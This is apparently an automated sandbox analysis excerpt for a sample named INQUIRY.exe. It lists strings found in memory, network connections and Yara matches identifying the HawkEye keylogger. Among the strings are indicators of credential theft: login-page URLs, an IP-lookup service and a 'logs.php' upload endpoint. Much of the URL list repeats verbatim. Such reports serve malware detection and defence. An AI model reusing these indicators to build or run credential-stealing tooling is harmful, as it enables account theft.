                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerslb
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
                    Source: INQUIRY.exe, 00000001.00000003.656578776.0000000004FED000.00000004.00000001.sdmpString found in binary or memory: http://en.w
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.LinkId=42127
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com
                    Source: INQUIRY.exe, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                    Source: INQUIRY.exe, 00000001.00000003.659667033.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661195055.0000000005011000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
                    Source: INQUIRY.exe, 00000001.00000003.659571445.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com$p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com0p
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMic
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTC(
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comTCE
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comandh
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comits
                    Source: INQUIRY.exe, 00000001.00000003.659772843.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                    Source: INQUIRY.exe, 00000001.00000003.660352640.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comle
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660006267.0000000004FF6000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comn
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.como.
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comsm
                    Source: INQUIRY.exe, 00000001.00000003.660235609.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comtig
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                    Source: INQUIRY.exe, 00000001.00000003.664630621.000000000501B000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                    Source: INQUIRY.exe, 00000001.00000003.664546236.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlu
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                    Source: INQUIRY.exe, 00000001.00000003.662998950.0000000005011000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersd
                    Source: INQUIRY.exe, 00000001.00000003.663957016.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designershq
                    Source: INQUIRY.exe, 00000001.00000003.664066811.0000000005016000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designerslb
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comTTFF
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalsd=
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comepko
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comessed
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrito
                    Source: INQUIRY.exe, 00000001.00000003.664511180.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comk
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comlvfet
                    Source: INQUIRY.exe, 00000001.00000003.670995336.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm=
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comnc.
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coms
                    Source: INQUIRY.exe, 00000001.00000003.665416380.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsiv&
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
                    Source: INQUIRY.exe, 00000001.00000003.659052456.0000000005013000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.657519748.0000000005012000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                    Source: INQUIRY.exe, 00000001.00000003.666565645.0000000004FEF000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.661257796.0000000004FEB000.00000004.00000001.sdmp, INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/://w
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Treb
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/_
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/cheV
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp//
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/=
                    Source: INQUIRY.exe, 00000001.00000003.661599639.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
                    Source: INQUIRY.exe, 00000001.00000003.660714589.0000000004FE4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/
                    Source: INQUIRY.exe, 00000001.00000003.661005611.0000000004FEB000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/typo
                    Source: vbc.exe, 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: http://www.site.com/logs.php
                    Source: INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
                    Source: INQUIRY.exe, 00000001.00000003.660146058.0000000004FEC000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: INQUIRY.exe, 00000001.00000002.743094862.0000000005150000.00000002.00000001.sdmp, INQUIRY.exe, 00000010.00000002.830353978.0000000005270000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: INQUIRY.exe, 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com
                    Source: INQUIRY.exe, 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmpString found in binary or memory: https://whatismyipaddress.com/
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmpString found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
                    Source: INQUIRY.exe, vbc.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778

                    Key, Mouse, Clipboard, Microphone and Screen Capturing:

                    barindex
                    Yara detected HawkEye KeyloggerShow sources
                    Source: Yara matchFile source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORY
